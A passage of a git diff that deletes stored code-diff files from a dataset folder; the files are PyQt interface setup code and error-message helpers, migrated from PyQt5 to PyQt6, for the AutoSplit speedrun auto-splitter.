self.livesimilarityLabel.setObjectName(_fromUtf8("livesimilarityLabel")) - self.highestsimilarityLabel = QtWidgets.QLabel(self.centralwidget) - self.highestsimilarityLabel.setGeometry(QtCore.QRect(160, 353, 46, 13)) - self.highestsimilarityLabel.setText(_fromUtf8("")) - self.highestsimilarityLabel.setObjectName(_fromUtf8("highestsimilarityLabel")) - self.splitLabel = QtWidgets.QLabel(self.centralwidget) - self.splitLabel.setGeometry(QtCore.QRect(249, 317, 61, 16)) - self.splitLabel.setObjectName(_fromUtf8("splitLabel")) - self.resetLabel = QtWidgets.QLabel(self.centralwidget) - self.resetLabel.setGeometry(QtCore.QRect(249, 341, 61, 16)) - self.resetLabel.setObjectName(_fromUtf8("resetLabel")) - self.skiptsplitLabel = QtWidgets.QLabel(self.centralwidget) - self.skiptsplitLabel.setGeometry(QtCore.QRect(249, 367, 50, 16)) - self.skiptsplitLabel.setObjectName(_fromUtf8("skiptsplitLabel")) - self.undosplitLabel = QtWidgets.QLabel(self.centralwidget) - self.undosplitLabel.setGeometry(QtCore.QRect(249, 393, 61, 16)) - self.undosplitLabel.setObjectName(_fromUtf8("undosplitLabel")) - self.pausehotkeyLabel = QtWidgets.QLabel(self.centralwidget) - self.pausehotkeyLabel.setGeometry(QtCore.QRect(249, 418, 61, 16)) - self.pausehotkeyLabel.setObjectName(_fromUtf8("undosplitLabel")) - self.splitLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.splitLineEdit.setGeometry(QtCore.QRect(316, 314, 81, 20)) - self.splitLineEdit.setReadOnly(True) - self.splitLineEdit.setObjectName(_fromUtf8("splitLineEdit")) - self.undosplitLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.undosplitLineEdit.setGeometry(QtCore.QRect(316, 391, 81, 20)) - self.undosplitLineEdit.setFocusPolicy(QtCore.Qt.FocusPolicy.StrongFocus) - self.undosplitLineEdit.setReadOnly(True) - self.undosplitLineEdit.setObjectName(_fromUtf8("undosplitLineEdit")) - self.skipsplitLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.skipsplitLineEdit.setGeometry(QtCore.QRect(316, 365, 81, 20)) - self.skipsplitLineEdit.setReadOnly(True) - self.skipsplitLineEdit.setObjectName(_fromUtf8("skipsplitLineEdit")) - self.resetLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.resetLineEdit.setGeometry(QtCore.QRect(316, 339, 81, 20)) - self.resetLineEdit.setReadOnly(True) - self.resetLineEdit.setObjectName(_fromUtf8("resetLineEdit")) - self.pausehotkeyLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.pausehotkeyLineEdit.setGeometry(QtCore.QRect(316, 416, 81, 20)) - self.pausehotkeyLineEdit.setReadOnly(True) - self.pausehotkeyLineEdit.setObjectName(_fromUtf8("pausehotkeyLineEdit")) - self.setsplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setsplithotkeyButton.setGeometry(QtCore.QRect(409, 314, 71, 21)) - self.setsplithotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setsplithotkeyButton.setObjectName(_fromUtf8("setsplithotkeyButton")) - self.setresethotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setresethotkeyButton.setGeometry(QtCore.QRect(410, 339, 71, 21)) - self.setresethotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setresethotkeyButton.setObjectName(_fromUtf8("setresethotkeyButton")) - self.setskipsplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setskipsplithotkeyButton.setGeometry(QtCore.QRect(410, 365, 71, 21)) - self.setskipsplithotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setskipsplithotkeyButton.setObjectName(_fromUtf8("setskipsplithotkeyButton")) - self.setundosplithotkeyButton = 
QtWidgets.QPushButton(self.centralwidget) - self.setundosplithotkeyButton.setGeometry(QtCore.QRect(410, 391, 71, 21)) - self.setundosplithotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setundosplithotkeyButton.setObjectName(_fromUtf8("setundosplithotkeyButton")) - self.setpausehotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setpausehotkeyButton.setGeometry(QtCore.QRect(410, 416, 71, 21)) - self.setpausehotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setpausehotkeyButton.setObjectName(_fromUtf8("setpausehotkeyButton")) - self.line_live_bottom = QtWidgets.QFrame(self.centralwidget) - self.line_live_bottom.setGeometry(QtCore.QRect(111, 247, 240, 2)) - self.line_live_bottom.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_live_bottom.setLineWidth(1) - self.line_live_bottom.setFrameShape(QtWidgets.QFrame.Shape.HLine) - self.line_live_bottom.setObjectName(_fromUtf8("line_live_bottom")) - self.line_live_top = QtWidgets.QFrame(self.centralwidget) - self.line_live_top.setGeometry(QtCore.QRect(111, 68, 240, 2)) - self.line_live_top.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_live_top.setLineWidth(1) - self.line_live_top.setFrameShape(QtWidgets.QFrame.Shape.HLine) - self.line_live_top.setObjectName(_fromUtf8("line_live_top")) - self.line_live_right = QtWidgets.QFrame(self.centralwidget) - self.line_live_right.setGeometry(QtCore.QRect(349, 69, 2, 180)) - self.line_live_right.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_live_right.setLineWidth(1) - self.line_live_right.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_live_right.setObjectName(_fromUtf8("line_live_right")) - self.line_left = QtWidgets.QFrame(self.centralwidget) - self.line_left.setGeometry(QtCore.QRect(234, 296, 2, 163)) - self.line_left.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_left.setLineWidth(1) - self.line_left.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_left.setObjectName(_fromUtf8("line_left")) - self.line_live_left = QtWidgets.QFrame(self.centralwidget) - self.line_live_left.setGeometry(QtCore.QRect(110, 69, 2, 180)) - self.line_live_left.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_live_left.setLineWidth(1) - self.line_live_left.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_live_left.setObjectName(_fromUtf8("line_live_left")) - self.line_split_left = QtWidgets.QFrame(self.centralwidget) - self.line_split_left.setGeometry(QtCore.QRect(360, 69, 2, 180)) - self.line_split_left.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_split_left.setLineWidth(1) - self.line_split_left.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_split_left.setObjectName(_fromUtf8("line_split_left")) - self.line_split_right = QtWidgets.QFrame(self.centralwidget) - self.line_split_right.setGeometry(QtCore.QRect(599, 69, 2, 180)) - self.line_split_right.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_split_right.setLineWidth(1) - self.line_split_right.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_split_right.setObjectName(_fromUtf8("line_split_right")) - self.line_split_top = QtWidgets.QFrame(self.centralwidget) - self.line_split_top.setGeometry(QtCore.QRect(361, 68, 240, 2)) - self.line_split_top.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_split_top.setLineWidth(1) - self.line_split_top.setFrameShape(QtWidgets.QFrame.Shape.HLine) - self.line_split_top.setObjectName(_fromUtf8("line_split_top")) - self.line_split_bottom = QtWidgets.QFrame(self.centralwidget) - 
self.line_split_bottom.setGeometry(QtCore.QRect(361, 247, 240, 2)) - self.line_split_bottom.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_split_bottom.setLineWidth(1) - self.line_split_bottom.setFrameShape(QtWidgets.QFrame.Shape.HLine) - self.line_split_bottom.setObjectName(_fromUtf8("line_split_bottom")) - self.timerglobalhotkeysLabel = QtWidgets.QLabel(self.centralwidget) - self.timerglobalhotkeysLabel.setGeometry(QtCore.QRect(313, 293, 101, 20)) - self.timerglobalhotkeysLabel.setObjectName(_fromUtf8("timerglobalhotkeysLabel")) - self.line_right = QtWidgets.QFrame(self.centralwidget) - self.line_right.setGeometry(QtCore.QRect(489, 296, 2, 163)) - self.line_right.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_right.setLineWidth(1) - self.line_right.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_right.setObjectName(_fromUtf8("line_right")) - self.liveImage = QtWidgets.QLabel(self.centralwidget) - self.liveImage.setGeometry(QtCore.QRect(111, 69, 240, 180)) - self.liveImage.setText(_fromUtf8("")) - self.liveImage.setObjectName(_fromUtf8("liveImage")) - self.currentSplitImage = QtWidgets.QLabel(self.centralwidget) - self.currentSplitImage.setGeometry(QtCore.QRect(361, 69, 240, 180)) - self.currentSplitImage.setText(_fromUtf8("")) - self.currentSplitImage.setObjectName(_fromUtf8("currentSplitImage")) - self.currentsplitimageLabel = QtWidgets.QLabel(self.centralwidget) - self.currentsplitimageLabel.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - self.currentsplitimageLabel.setGeometry(QtCore.QRect(370, 50, 221, 20)) - self.currentsplitimageLabel.setObjectName(_fromUtf8("currentsplitimageLabel")) - self.imageloopLabel = QtWidgets.QLabel(self.centralwidget) - self.imageloopLabel.setGeometry(QtCore.QRect(362, 251, 108, 20)) - self.imageloopLabel.setObjectName(_fromUtf8("Image Loop #:")) - self.widthLabel = QtWidgets.QLabel(self.centralwidget) - self.widthLabel.setGeometry(QtCore.QRect(14, 177, 31, 16)) - self.widthLabel.setObjectName(_fromUtf8("widthLabel")) - self.heightLabel = QtWidgets.QLabel(self.centralwidget) - self.heightLabel.setGeometry(QtCore.QRect(68, 177, 31, 16)) - self.heightLabel.setObjectName(_fromUtf8("heightLabel")) - self.fpsvalueLabel = QtWidgets.QLabel(self.centralwidget) - self.fpsvalueLabel.setGeometry(QtCore.QRect(58, 225, 26, 20)) - self.fpsvalueLabel.setText(_fromUtf8("")) - self.fpsvalueLabel.setObjectName(_fromUtf8("fpsvalueLabel")) - self.widthSpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.widthSpinBox.setGeometry(QtCore.QRect(6, 193, 44, 22)) - self.widthSpinBox.setMinimum(1) - self.widthSpinBox.setMaximum(10000) - self.widthSpinBox.setProperty("value", 640) - self.widthSpinBox.setObjectName(_fromUtf8("widthSpinBox")) - self.heightSpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.heightSpinBox.setGeometry(QtCore.QRect(62, 193, 44, 22)) - self.heightSpinBox.setMinimum(1) - self.heightSpinBox.setMaximum(10000) - self.heightSpinBox.setProperty("value", 480) - self.heightSpinBox.setObjectName(_fromUtf8("heightSpinBox")) - self.captureregionLabel = QtWidgets.QLabel(self.centralwidget) - self.captureregionLabel.setGeometry(QtCore.QRect(192, 50, 81, 16)) - self.captureregionLabel.setObjectName(_fromUtf8("captureregionLabel")) - self.fpslimitLabel = QtWidgets.QLabel(self.centralwidget) - self.fpslimitLabel.setGeometry(QtCore.QRect(8, 251, 51, 16)) - self.fpslimitLabel.setObjectName(_fromUtf8("fpslimitLabel")) - self.fpslimitSpinBox = QtWidgets.QDoubleSpinBox(self.centralwidget) - 
self.fpslimitSpinBox.setGeometry(QtCore.QRect(62, 248, 44, 22)) - self.fpslimitSpinBox.setPrefix(_fromUtf8("")) - self.fpslimitSpinBox.setDecimals(0) - self.fpslimitSpinBox.setMinimum(30.0) - self.fpslimitSpinBox.setMaximum(5000.0) - self.fpslimitSpinBox.setSingleStep(1.0) - self.fpslimitSpinBox.setProperty("value", 60.0) - self.fpslimitSpinBox.setObjectName(_fromUtf8("fpslimitSpinBox")) - self.currentsplitimagefileLabel = QtWidgets.QLabel(self.centralwidget) - self.currentsplitimagefileLabel.setGeometry(QtCore.QRect(362, 271, 237, 20)) - self.currentsplitimagefileLabel.setText(_fromUtf8("")) - self.currentsplitimagefileLabel.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - self.currentsplitimagefileLabel.setObjectName(_fromUtf8("currentsplitimagefileLabel")) - self.takescreenshotButton = QtWidgets.QPushButton(self.centralwidget) - self.takescreenshotButton.setGeometry(QtCore.QRect(250, 251, 91, 21)) - self.takescreenshotButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.takescreenshotButton.setObjectName(_fromUtf8("takescreenshotButton")) - self.xSpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.xSpinBox.setGeometry(QtCore.QRect(6, 154, 44, 22)) - self.xSpinBox.setReadOnly(False) - self.xSpinBox.setButtonSymbols(QtWidgets.QAbstractSpinBox.ButtonSymbols.UpDownArrows) - self.xSpinBox.setMinimum(0) - self.xSpinBox.setMaximum(999999999) - self.xSpinBox.setSingleStep(1) - self.xSpinBox.setProperty("value", 0) - self.xSpinBox.setObjectName(_fromUtf8("xSpinBox")) - self.ySpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.ySpinBox.setGeometry(QtCore.QRect(62, 154, 44, 22)) - self.ySpinBox.setReadOnly(False) - self.ySpinBox.setButtonSymbols(QtWidgets.QAbstractSpinBox.ButtonSymbols.UpDownArrows) - self.ySpinBox.setMinimum(0) - self.ySpinBox.setMaximum(999999999) - self.ySpinBox.setProperty("value", 0) - self.ySpinBox.setObjectName(_fromUtf8("ySpinBox")) - self.yLabel = QtWidgets.QLabel(self.centralwidget) - self.yLabel.setGeometry(QtCore.QRect(81, 139, 7, 16)) - self.yLabel.setObjectName(_fromUtf8("yLabel")) - self.comparisonmethodComboBox = QtWidgets.QComboBox(self.centralwidget) - self.comparisonmethodComboBox.setGeometry(QtCore.QRect(143, 299, 81, 22)) - self.comparisonmethodComboBox.setObjectName(_fromUtf8("comparisonmethodComboBox")) - self.comparisonmethodComboBox.addItem(_fromUtf8("")) - self.comparisonmethodComboBox.addItem(_fromUtf8("")) - self.comparisonmethodComboBox.addItem(_fromUtf8("")) - self.pauseDoubleSpinBox = QtWidgets.QDoubleSpinBox(self.centralwidget) - self.pauseDoubleSpinBox.setGeometry(QtCore.QRect(160, 425, 64, 22)) - self.pauseDoubleSpinBox.setMaximum(999999999.0) - self.pauseDoubleSpinBox.setSingleStep(1.0) - self.pauseDoubleSpinBox.setProperty("value", 10.0) - self.pauseDoubleSpinBox.setObjectName(_fromUtf8("pauseDoubleSpinBox")) - self.custompausetimesCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.custompausetimesCheckBox.setEnabled(True) - self.custompausetimesCheckBox.setGeometry(QtCore.QRect(10, 435, 121, 17)) - self.custompausetimesCheckBox.setWhatsThis(_fromUtf8("")) - self.custompausetimesCheckBox.setChecked(False) - self.custompausetimesCheckBox.setTristate(False) - self.custompausetimesCheckBox.setObjectName(_fromUtf8("custompausetimesCheckBox")) - self.customthresholdsCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.customthresholdsCheckBox.setEnabled(True) - self.customthresholdsCheckBox.setGeometry(QtCore.QRect(10, 394, 111, 17)) - self.customthresholdsCheckBox.setWhatsThis(_fromUtf8("")) - 
self.customthresholdsCheckBox.setChecked(False) - self.customthresholdsCheckBox.setTristate(False) - self.customthresholdsCheckBox.setObjectName(_fromUtf8("customthresholdsCheckBox")) - self.comparisonmethodLabel = QtWidgets.QLabel(self.centralwidget) - self.comparisonmethodLabel.setGeometry(QtCore.QRect(10, 300, 101, 16)) - self.comparisonmethodLabel.setObjectName(_fromUtf8("comparisonmethodLabel")) - self.alignregionButton = QtWidgets.QPushButton(self.centralwidget) - self.alignregionButton.setGeometry(QtCore.QRect(5, 92, 101, 23)) - self.alignregionButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.alignregionButton.setObjectName(_fromUtf8("alignregionButton")) - self.groupDummySplitsCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.groupDummySplitsCheckBox.setGeometry(QtCore.QRect(252, 440, 230, 17)) - self.groupDummySplitsCheckBox.setChecked(False) - self.groupDummySplitsCheckBox.setObjectName(_fromUtf8("groupDummySplitsCheckBox")) - self.selectwindowButton = QtWidgets.QPushButton(self.centralwidget) - self.selectwindowButton.setGeometry(QtCore.QRect(5, 117, 101, 23)) - self.selectwindowButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.selectwindowButton.setObjectName(_fromUtf8("selectwindowButton")) - self.splitimagefolderLabel.raise_() - self.splitimagefolderLineEdit.raise_() - self.browseButton.raise_() - self.xLabel.raise_() - self.liveimageCheckBox.raise_() - self.loopCheckBox.raise_() - self.autostartonresetCheckBox.raise_() - self.selectregionButton.raise_() - self.similaritythresholdLabel.raise_() - self.similaritythresholdDoubleSpinBox.raise_() - self.startautosplitterButton.raise_() - self.resetButton.raise_() - self.undosplitButton.raise_() - self.skipsplitButton.raise_() - self.pauseLabel.raise_() - self.checkfpsButton.raise_() - self.fpsLabel.raise_() - self.showlivesimilarityCheckBox.raise_() - self.showhighestsimilarityCheckBox.raise_() - self.livesimilarityLabel.raise_() - self.highestsimilarityLabel.raise_() - self.splitLabel.raise_() - self.resetLabel.raise_() - self.skiptsplitLabel.raise_() - self.undosplitLabel.raise_() - self.pausehotkeyLabel.raise_() - self.splitLineEdit.raise_() - self.undosplitLineEdit.raise_() - self.skipsplitLineEdit.raise_() - self.resetLineEdit.raise_() - self.pausehotkeyLineEdit.raise_() - self.setsplithotkeyButton.raise_() - self.setresethotkeyButton.raise_() - self.setskipsplithotkeyButton.raise_() - self.setundosplithotkeyButton.raise_() - self.setpausehotkeyButton.raise_() - self.line_live_bottom.raise_() - self.line_live_top.raise_() - self.line_live_right.raise_() - self.line_left.raise_() - self.line_live_left.raise_() - self.line_split_left.raise_() - self.line_split_right.raise_() - self.line_split_top.raise_() - self.line_split_bottom.raise_() - self.timerglobalhotkeysLabel.raise_() - self.line_right.raise_() - self.currentsplitimageLabel.raise_() - self.imageloopLabel.raise_() - self.liveImage.raise_() - self.currentSplitImage.raise_() - self.widthLabel.raise_() - self.heightLabel.raise_() - self.fpsvalueLabel.raise_() - self.widthSpinBox.raise_() - self.heightSpinBox.raise_() - self.captureregionLabel.raise_() - self.fpslimitLabel.raise_() - self.fpslimitSpinBox.raise_() - self.currentsplitimagefileLabel.raise_() - self.takescreenshotButton.raise_() - self.xSpinBox.raise_() - self.ySpinBox.raise_() - self.yLabel.raise_() - self.comparisonmethodComboBox.raise_() - self.pauseDoubleSpinBox.raise_() - self.custompausetimesCheckBox.raise_() - self.customthresholdsCheckBox.raise_() - 
self.comparisonmethodLabel.raise_() - self.alignregionButton.raise_() - self.groupDummySplitsCheckBox.raise_() - self.selectwindowButton.raise_() - MainWindow.setCentralWidget(self.centralwidget) - self.menuBar = QtWidgets.QMenuBar(MainWindow) - self.menuBar.setGeometry(QtCore.QRect(0, 0, 612, 21)) - self.menuBar.setObjectName(_fromUtf8("menuBar")) - self.menuFile = QtWidgets.QMenu(self.menuBar) - self.menuFile.setObjectName(_fromUtf8("menuFile")) - self.menuHelp = QtWidgets.QMenu(self.menuBar) - self.menuHelp.setObjectName(_fromUtf8("menuHelp")) - MainWindow.setMenuBar(self.menuBar) - self.actionView_Help = QtWidgets.QWidgetAction(MainWindow) - self.actionView_Help.setObjectName(_fromUtf8("actionView_Help")) - self.actionAbout = QtWidgets.QWidgetAction(MainWindow) - self.actionAbout.setObjectName(_fromUtf8("actionAbout")) - self.actionSave_Settings = QtWidgets.QWidgetAction(MainWindow) - self.actionSave_Settings.setObjectName(_fromUtf8("actionSave_Settings")) - self.actionSave_Settings_As = QtWidgets.QWidgetAction(MainWindow) - self.actionSave_Settings_As.setObjectName(_fromUtf8("actionSave_Settings_As")) - self.actionLoad_Settings = QtWidgets.QWidgetAction(MainWindow) - self.actionLoad_Settings.setObjectName(_fromUtf8("actionLoad_Settings")) - self.menuHelp.addAction(self.actionView_Help) - self.menuHelp.addAction(self.actionAbout) - self.menuFile.addAction(self.actionSave_Settings) - self.menuFile.addAction(self.actionSave_Settings_As) - self.menuFile.addAction(self.actionLoad_Settings) - self.menuBar.addAction(self.menuFile.menuAction()) - self.menuBar.addAction(self.menuHelp.menuAction()) - - self.retranslateUi(MainWindow) - QtCore.QMetaObject.connectSlotsByName(MainWindow) - MainWindow.setTabOrder(self.splitimagefolderLineEdit, self.xSpinBox) - MainWindow.setTabOrder(self.xSpinBox, self.ySpinBox) - MainWindow.setTabOrder(self.ySpinBox, self.widthSpinBox) - MainWindow.setTabOrder(self.widthSpinBox, self.heightSpinBox) - MainWindow.setTabOrder(self.heightSpinBox, self.fpslimitSpinBox) - MainWindow.setTabOrder(self.fpslimitSpinBox, self.liveimageCheckBox) - MainWindow.setTabOrder(self.liveimageCheckBox, self.comparisonmethodComboBox) - MainWindow.setTabOrder(self.comparisonmethodComboBox, self.showlivesimilarityCheckBox) - MainWindow.setTabOrder(self.showlivesimilarityCheckBox, self.showhighestsimilarityCheckBox) - MainWindow.setTabOrder(self.showhighestsimilarityCheckBox, self.customthresholdsCheckBox) - MainWindow.setTabOrder(self.customthresholdsCheckBox, self.similaritythresholdDoubleSpinBox) - MainWindow.setTabOrder(self.similaritythresholdDoubleSpinBox, self.custompausetimesCheckBox) - MainWindow.setTabOrder(self.custompausetimesCheckBox, self.pauseDoubleSpinBox) - MainWindow.setTabOrder(self.pauseDoubleSpinBox, self.splitLineEdit) - MainWindow.setTabOrder(self.splitLineEdit, self.resetLineEdit) - MainWindow.setTabOrder(self.resetLineEdit, self.skipsplitLineEdit) - MainWindow.setTabOrder(self.skipsplitLineEdit, self.undosplitLineEdit) - MainWindow.setTabOrder(self.undosplitLineEdit, self.pausehotkeyLineEdit) - MainWindow.setTabOrder(self.pausehotkeyLineEdit, self.groupDummySplitsCheckBox) - MainWindow.setTabOrder(self.groupDummySplitsCheckBox, self.loopCheckBox) - MainWindow.setTabOrder(self.loopCheckBox, self.autostartonresetCheckBox) - - def retranslateUi(self, MainWindow): - MainWindow.setWindowTitle(_translate("MainWindow", "AutoSplit", None)) - self.splitimagefolderLabel.setText(_translate("MainWindow", "Split Image Folder:", None)) - 
self.browseButton.setText(_translate("MainWindow", "Browse..", None)) - self.xLabel.setText(_translate("MainWindow", "X", None)) - self.liveimageCheckBox.setText(_translate("MainWindow", "Live Capture Region", None)) - self.loopCheckBox.setText(_translate("MainWindow", "Loop Split Images", None)) - self.autostartonresetCheckBox.setText(_translate("MainWindow", "Auto Start On Reset", None)) - self.selectregionButton.setText(_translate("MainWindow", "Select Region", None)) - self.similaritythresholdLabel.setText(_translate("MainWindow", "Similarity threshold", None)) - self.startautosplitterButton.setText(_translate("MainWindow", "Start Auto Splitter", None)) - self.resetButton.setText(_translate("MainWindow", "Reset", None)) - self.undosplitButton.setText(_translate("MainWindow", "Undo Split", None)) - self.skipsplitButton.setText(_translate("MainWindow", "Skip Split", None)) - self.pauseLabel.setText(_translate("MainWindow", "Pause time after split (sec)", None)) - self.checkfpsButton.setText(_translate("MainWindow", "Max FPS", None)) - self.fpsLabel.setText(_translate("MainWindow", "FPS", None)) - self.showlivesimilarityCheckBox.setText(_translate("MainWindow", "Show live similarity", None)) - self.showhighestsimilarityCheckBox.setText(_translate("MainWindow", "Show highest similarity", None)) - self.splitLabel.setText(_translate("MainWindow", "Start / Split", None)) - self.resetLabel.setText(_translate("MainWindow", "Reset", None)) - self.skiptsplitLabel.setText(_translate("MainWindow", "Skip Split", None)) - self.undosplitLabel.setText(_translate("MainWindow", "Undo Split", None)) - self.pausehotkeyLabel.setText(_translate("MainWindow", "Pause", None)) - self.setsplithotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.setresethotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.setskipsplithotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.setundosplithotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.setpausehotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.timerglobalhotkeysLabel.setText(_translate("MainWindow", "Timer Global Hotkeys", None)) - self.currentsplitimageLabel.setText(_translate("MainWindow", "Current Split Image", None)) - self.imageloopLabel.setText(_translate("MainWindow", "Image Loop #:", None)) - self.widthLabel.setText(_translate("MainWindow", "Width", None)) - self.heightLabel.setText(_translate("MainWindow", "Height", None)) - self.captureregionLabel.setText(_translate("MainWindow", "Capture Region", None)) - self.fpslimitLabel.setText(_translate("MainWindow", "FPS Limit:", None)) - self.takescreenshotButton.setText(_translate("MainWindow", "Take Screenshot", None)) - self.yLabel.setText(_translate("MainWindow", "Y", None)) - self.comparisonmethodComboBox.setItemText(0, _translate("MainWindow", "L2 Norm", None)) - self.comparisonmethodComboBox.setItemText(1, _translate("MainWindow", "Histograms", None)) - self.comparisonmethodComboBox.setItemText(2, _translate("MainWindow", "pHash", None)) - self.custompausetimesCheckBox.setText(_translate("MainWindow", "Custom pause times", None)) - self.customthresholdsCheckBox.setText(_translate("MainWindow", "Custom thresholds", None)) - self.comparisonmethodLabel.setText(_translate("MainWindow", "Comparison Method", None)) - self.alignregionButton.setText(_translate("MainWindow", "Align Region", None)) - self.groupDummySplitsCheckBox.setText(_translate("MainWindow", "Group dummy splits when undoing/skipping", None)) 
- self.selectwindowButton.setText(_translate("MainWindow", "Select Window", None)) - self.menuHelp.setTitle(_translate("MainWindow", "Help", None)) - self.menuFile.setTitle(_translate("MainWindow", "File", None)) - self.actionView_Help.setText(_translate("MainWindow", "View Help", None)) - self.actionAbout.setText(_translate("MainWindow", "About", None)) - self.actionSave_Settings.setText(_translate("MainWindow", "Save Settings", None)) - self.actionSave_Settings_As.setText(_translate("MainWindow", "Save Settings As...", None)) - self.actionLoad_Settings.setText(_translate("MainWindow", "Load Settings", None)) - - -if __name__ == "__main__": - import sys - app = QtWidgets.QApplication(sys.argv) - MainWindow = QtWidgets.QMainWindow() - ui = Ui_MainWindow() - ui.setupUi(MainWindow) - MainWindow.show() - sys.exit(app.exec()) diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.diff b/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.diff deleted file mode 100644 index 7b6c743..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.diff +++ /dev/null @@ -1,184 +0,0 @@ -diff --git a/src/error_messages.py b/src/error_messages.py - index a43c20e4d2b01d4642956e22c666eb23b7e25471..86244b6c190f48200826788fa6af4bd8d26b230f 100644 - --- a/src/error_messages.py - +++ b/src/error_messages.py -@@ -1,142 +1,93 @@ - # Error messages --from PyQt5 import QtWidgets -+from PyQt6 import QtWidgets - --def splitImageDirectoryError(self): -+ -+def setTextMessage(message: str): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') -- msgBox.setText("No split image folder is selected.") -- msgBox.exec_() -+ msgBox.setText(message) -+ msgBox.exec() -+ -+ -+def splitImageDirectoryError(self): -+ setTextMessage("No split image folder is selected.") -+ - - def splitImageDirectoryNotFoundError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("The Split Image Folder does not exist.") -- msgBox.exec_() -+ setTextMessage("The Split Image Folder does not exist.") - - - def imageTypeError(self, image): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText( -- '"' + image + '" is not a valid image file or the full image file path contains a special character.') -- msgBox.exec_() -+ setTextMessage('"' + image + '" is not a valid image file or the full image file path contains a special character.') - - - def regionError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("No region is selected or the Capture Region window is not open. Select a region or load settings while the Capture Region window is open.") -- msgBox.exec_() -+ setTextMessage("No region is selected or the Capture Region window is not open. Select a region or load settings while the Capture Region window is open.") - - - def regionSizeError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("Width and height cannot be 0. Please select a larger region.") -- msgBox.exec_() -+ setTextMessage("Width and height cannot be 0. 
Please select a larger region.") - - - def splitHotkeyError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("No split hotkey has been set.") -- msgBox.exec_() -+ setTextMessage("No split hotkey has been set.") -+ - - def pauseHotkeyError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("Your split image folder contains an image filename with a pause flag {p}, but no pause hotkey is set.") -- msgBox.exec_() -+ setTextMessage("Your split image folder contains an image filename with a pause flag {p}, but no pause hotkey is set.") -+ - - def customThresholdError(self, image): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("\"" + image + "\" doesn't have a valid custom threshold.") -- msgBox.exec_() -+ setTextMessage("\"" + image + "\" doesn't have a valid custom threshold.") - - - def customPauseError(self, image): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("\"" + image + "\" doesn't have a valid custom pause time.") -- msgBox.exec_() -+ setTextMessage("\"" + image + "\" doesn't have a valid custom pause time.") - - - def alphaChannelError(self, image): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("\"" + image + "\" is marked with mask flag but it doesn't have transparency.") -- msgBox.exec_() -+ setTextMessage("\"" + image + "\" is marked with mask flag but it doesn't have transparency.") - - - def alignRegionImageTypeError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("File not a valid image file") -- msgBox.exec_() -+ setTextMessage("File not a valid image file") - - - def alignmentNotMatchedError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("No area in capture region matched reference image. Alignment failed.") -- msgBox.exec_() -+ setTextMessage("No area in capture region matched reference image. Alignment failed.") - - - 